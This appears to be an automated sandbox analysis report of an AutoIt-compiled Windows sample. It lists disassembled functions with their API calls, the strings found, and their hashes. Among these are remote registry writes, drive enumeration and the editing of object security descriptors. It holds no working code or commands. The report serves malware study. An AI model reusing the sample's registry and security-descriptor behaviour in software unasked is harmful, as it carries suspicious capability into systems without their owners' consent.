                                                                                  • Opcode Fuzzy Hash: 55eda87a3d3ee4575f663b0988414d51d86a1c651b8ac54deee3baf8ff973efe
                                                                                  • Instruction Fuzzy Hash: 27B17C71A10205AFEB14DFA9DC8AFAEBBB9EB18711F108159F914E7290D770ED10CB64
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00234AED
                                                                                  • GetDriveTypeW.KERNEL32(?,0025CB68,?,\\.\,0025CC08), ref: 00234BCA
                                                                                  • SetErrorMode.KERNEL32(00000000,0025CB68,?,\\.\,0025CC08), ref: 00234D36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DriveType
                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                  • API String ID: 2907320926-4222207086
                                                                                  • Opcode ID: af5d12e1cc6c4454ed36ea30bbdeec83603484b85190e28c1ddee0cc5c4d6d6d
                                                                                  • Instruction ID: d58994456781ed9ff86a72b92cbca423322425bc7fe5b5453a19a7d4131a0a4a
                                                                                  • Opcode Fuzzy Hash: af5d12e1cc6c4454ed36ea30bbdeec83603484b85190e28c1ddee0cc5c4d6d6d
                                                                                  • Instruction Fuzzy Hash: E361F7B46322069FCB04FF14C989E6CB7A1EB15304F249996F806AB292DB71FD71DB41
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000012), ref: 00257421
                                                                                  • SetTextColor.GDI32(?,?), ref: 00257425
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0025743B
                                                                                  • GetSysColor.USER32(0000000F), ref: 00257446
                                                                                  • CreateSolidBrush.GDI32(?), ref: 0025744B
                                                                                  • GetSysColor.USER32(00000011), ref: 00257463
                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00257471
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00257482
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0025748B
                                                                                  • SelectObject.GDI32(?,?), ref: 00257498
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 002574B7
                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002574CE
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 002574DB
                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0025752A
                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00257554
                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00257572
                                                                                  • DrawFocusRect.USER32(?,?), ref: 0025757D
                                                                                  • GetSysColor.USER32(00000011), ref: 0025758E
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00257596
                                                                                  • DrawTextW.USER32(?,002570F5,000000FF,?,00000000), ref: 002575A8
                                                                                  • SelectObject.GDI32(?,?), ref: 002575BF
                                                                                  • DeleteObject.GDI32(?), ref: 002575CA
                                                                                  • SelectObject.GDI32(?,?), ref: 002575D0
                                                                                  • DeleteObject.GDI32(?), ref: 002575D5
                                                                                  • SetTextColor.GDI32(?,?), ref: 002575DB
                                                                                  • SetBkColor.GDI32(?,?), ref: 002575E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                  • String ID:
                                                                                  • API String ID: 1996641542-0
                                                                                  • Opcode ID: 31f424d34d5d048d1d799edf44b97e286b6974f2a8b8239b3f135c9e3b40b04d
                                                                                  • Instruction ID: de55d0db03a4de6e80633c0bb0192b9e8a2850a245a9894141573ae7ed40cd2b
                                                                                  • Opcode Fuzzy Hash: 31f424d34d5d048d1d799edf44b97e286b6974f2a8b8239b3f135c9e3b40b04d
                                                                                  • Instruction Fuzzy Hash: A3614F72900319AFDF019FA4EC49EAE7FB9EB08321F218115F915BB2A1E7749950CF94
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 00251128
                                                                                  • GetDesktopWindow.USER32 ref: 0025113D
                                                                                  • GetWindowRect.USER32(00000000), ref: 00251144
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00251199
                                                                                  • DestroyWindow.USER32(?), ref: 002511B9
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002511ED
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0025120B
                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0025121D
                                                                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00251232
                                                                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00251245
                                                                                  • IsWindowVisible.USER32(00000000), ref: 002512A1
                                                                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002512BC
                                                                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002512D0
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 002512E8
                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0025130E
                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00251328
                                                                                  • CopyRect.USER32(?,?), ref: 0025133F
                                                                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 002513AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                  • String ID: ($0$tooltips_class32
                                                                                  • API String ID: 698492251-4156429822
                                                                                  • Opcode ID: 1bc66c0f719b4b13bc1c32b27334f0a04aac87d899af705274a8910a9feb3771
                                                                                  • Instruction ID: 99ff5808d4afa302e15d24ed23207fab60ca627d0cf48967778be3258651bce9
                                                                                  • Opcode Fuzzy Hash: 1bc66c0f719b4b13bc1c32b27334f0a04aac87d899af705274a8910a9feb3771
                                                                                  • Instruction Fuzzy Hash: 73B19971618341AFD700DF64D889F6ABBE4EF98311F00891CF9999B2A1D770EC68CB95
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001D8968
                                                                                  • GetSystemMetrics.USER32(00000007), ref: 001D8970
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001D899B
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 001D89A3
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 001D89C8
                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001D89E5
                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001D89F5
                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001D8A28
                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001D8A3C
                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 001D8A5A
                                                                                  • GetStockObject.GDI32(00000011), ref: 001D8A76
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 001D8A81
                                                                                    • Part of subcall function 001D912D: GetCursorPos.USER32(?), ref: 001D9141
                                                                                    • Part of subcall function 001D912D: ScreenToClient.USER32(00000000,?), ref: 001D915E
                                                                                    • Part of subcall function 001D912D: GetAsyncKeyState.USER32(00000001), ref: 001D9183
                                                                                    • Part of subcall function 001D912D: GetAsyncKeyState.USER32(00000002), ref: 001D919D
                                                                                  • SetTimer.USER32(00000000,00000000,00000028,001D90FC), ref: 001D8AA8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                  • String ID: AutoIt v3 GUI
                                                                                  • API String ID: 1458621304-248962490
                                                                                  • Opcode ID: d1edaceeea914e2188cf3843fcfda8af625d5c58e45da37b90c901abe27abb4d
                                                                                  • Instruction ID: 965ef9860bab12318e229a492fbe1fdddd3e5adb3de4587c881b4e26734fd788
                                                                                  • Opcode Fuzzy Hash: d1edaceeea914e2188cf3843fcfda8af625d5c58e45da37b90c901abe27abb4d
                                                                                  • Instruction Fuzzy Hash: 67B18C71A0030A9FDF14DFA8DC89BAE7BB5FB48315F11422AFA15A7290DB30E951CB54
                                                                                  APIs
                                                                                    • Part of subcall function 002210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00221114
                                                                                    • Part of subcall function 002210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221120
                                                                                    • Part of subcall function 002210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 0022112F
                                                                                    • Part of subcall function 002210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221136
                                                                                    • Part of subcall function 002210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0022114D
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00220DF5
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00220E29
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00220E40
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00220E7A
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00220E96
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00220EAD
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00220EB5
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00220EBC
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00220EDD
                                                                                  • CopySid.ADVAPI32(00000000), ref: 00220EE4
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00220F13
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00220F35
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00220F47
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220F6E
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00220F75
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220F7E
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00220F85
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220F8E
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00220F95
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00220FA1
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00220FA8
                                                                                    • Part of subcall function 00221193: GetProcessHeap.KERNEL32(00000008,00220BB1,?,00000000,?,00220BB1,?), ref: 002211A1
                                                                                    • Part of subcall function 00221193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00220BB1,?), ref: 002211A8
                                                                                    • Part of subcall function 00221193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00220BB1,?), ref: 002211B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                  • String ID:
                                                                                  • API String ID: 4175595110-0
                                                                                  • Opcode ID: bf965709a6d2160759621d7815e805988ad5cd0774b3480d84f86de6f6bd2933
                                                                                  • Instruction ID: ef0a21ed4d9b8d71386e5e6f6aca0d72f04bf724a1e28d344d5cc8d10359faba
                                                                                  • Opcode Fuzzy Hash: bf965709a6d2160759621d7815e805988ad5cd0774b3480d84f86de6f6bd2933
                                                                                  • Instruction Fuzzy Hash: 52716E7291031ABFDF209FA4ED88FAEBBB8FF04311F148125F919A6191DB309915CB60
                                                                                  APIs
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024C4BD
                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0025CC08,00000000,?,00000000,?,?), ref: 0024C544
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0024C5A4
                                                                                  • _wcslen.LIBCMT ref: 0024C5F4
                                                                                  • _wcslen.LIBCMT ref: 0024C66F
                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0024C6B2
                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0024C7C1
                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0024C84D
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0024C881
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024C88E
                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0024C960
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                  • API String ID: 9721498-966354055
                                                                                  • Opcode ID: 4b83e175a520e2049d8ffaf5d124be31933d2831bb80d0ec68aee4fb70a26783
                                                                                  • Instruction ID: 895f9d78c78a16c6d1b11519aecfc6c8bc9c3636d65d9f4af02d1f8e08928069
                                                                                  • Opcode Fuzzy Hash: 4b83e175a520e2049d8ffaf5d124be31933d2831bb80d0ec68aee4fb70a26783
                                                                                  • Instruction Fuzzy Hash: 7C1267356142019FC718DF18C881F2AB7E5EF98724F14889CF88A9B3A2DB31ED41CB85
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 002509C6
                                                                                  • _wcslen.LIBCMT ref: 00250A01
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00250A54
                                                                                  • _wcslen.LIBCMT ref: 00250A8A
                                                                                  • _wcslen.LIBCMT ref: 00250B06
                                                                                  • _wcslen.LIBCMT ref: 00250B81
                                                                                    • Part of subcall function 001DF9F2: _wcslen.LIBCMT ref: 001DF9FD
                                                                                    • Part of subcall function 00222BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00222BFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                  • API String ID: 1103490817-4258414348
                                                                                  • Opcode ID: b74c2d1e5e6a7a61b65d0d039589b5fc8403bc2487b599ba3fd906e5b4aa93d9
                                                                                  • Instruction ID: 54571654002e26236ac7b21686f06748107bcd519a192056caa700acc6f3da35
                                                                                  • Opcode Fuzzy Hash: b74c2d1e5e6a7a61b65d0d039589b5fc8403bc2487b599ba3fd906e5b4aa93d9
                                                                                  • Instruction Fuzzy Hash: C5E1AF352283029FC714EF24C89092AB7E1FFA8319B14495DFC969B3A2D731ED59CB85
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                  • API String ID: 1256254125-909552448
                                                                                  • Opcode ID: 2e400f054f748fa74d2ae7258684d4ac6c50d2bf70e55cabe0f9b0d7f7527674
                                                                                  • Instruction ID: 675dab077e347a30b85640cf3ac5ede147dfb98adaa1bb9df8850ef41f4efd83
                                                                                  • Opcode Fuzzy Hash: 2e400f054f748fa74d2ae7258684d4ac6c50d2bf70e55cabe0f9b0d7f7527674
                                                                                  • Instruction Fuzzy Hash: E771163363252B8BCB58DE7CC8515BE3395AF70758B340529F866AB284EB31CD65C7A0
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0025835A
                                                                                  • _wcslen.LIBCMT ref: 0025836E
                                                                                  • _wcslen.LIBCMT ref: 00258391
                                                                                  • _wcslen.LIBCMT ref: 002583B4
                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002583F2
                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0025361A,?), ref: 0025844E
                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00258487
                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002584CA
                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00258501
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0025850D
                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0025851D
                                                                                  • DestroyIcon.USER32(?), ref: 0025852C
                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00258549
                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00258555
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                  • String ID: .dll$.exe$.icl
                                                                                  • API String ID: 799131459-1154884017
                                                                                  • Opcode ID: ed9be1e1969181bdd8beb644c7238c31cc30e52cd6986c2ae400bf18e097056d
                                                                                  • Instruction ID: 3d26d835b369fd0bb68d936f33420385f32e548c5f4c425c14300be220d7deef
                                                                                  • Opcode Fuzzy Hash: ed9be1e1969181bdd8beb644c7238c31cc30e52cd6986c2ae400bf18e097056d
                                                                                  • Instruction Fuzzy Hash: 4861FF71910306BEEB14DF64DC85BBE77A8BB18B22F104109FC15E60D1EBB4A964CBA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                  • API String ID: 0-1645009161
                                                                                  • Opcode ID: 034bae8d938899245861ae2cc107f83a29958530d48eb947f5ce63207eedb44f
                                                                                  • Instruction ID: a170e65d928a6f2eaa1a67657a07f1caf6d0a6772aa3df3a736a97ced3bb7312
                                                                                  • Opcode Fuzzy Hash: 034bae8d938899245861ae2cc107f83a29958530d48eb947f5ce63207eedb44f
                                                                                  • Instruction Fuzzy Hash: BD81E671614715BBDB20AF60DD47FAF77A8AF35300F044029F909AA1D6EBB0DA25CB91
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000063), ref: 00225A2E
                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00225A40
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00225A57
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00225A6C
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00225A72
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00225A82
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00225A88
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00225AA9
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00225AC3
                                                                                  • GetWindowRect.USER32(?,?), ref: 00225ACC
                                                                                  • _wcslen.LIBCMT ref: 00225B33
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00225B6F
                                                                                  • GetDesktopWindow.USER32 ref: 00225B75
                                                                                  • GetWindowRect.USER32(00000000), ref: 00225B7C
                                                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00225BD3
                                                                                  • GetClientRect.USER32(?,?), ref: 00225BE0
                                                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 00225C05
                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00225C2F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 895679908-0
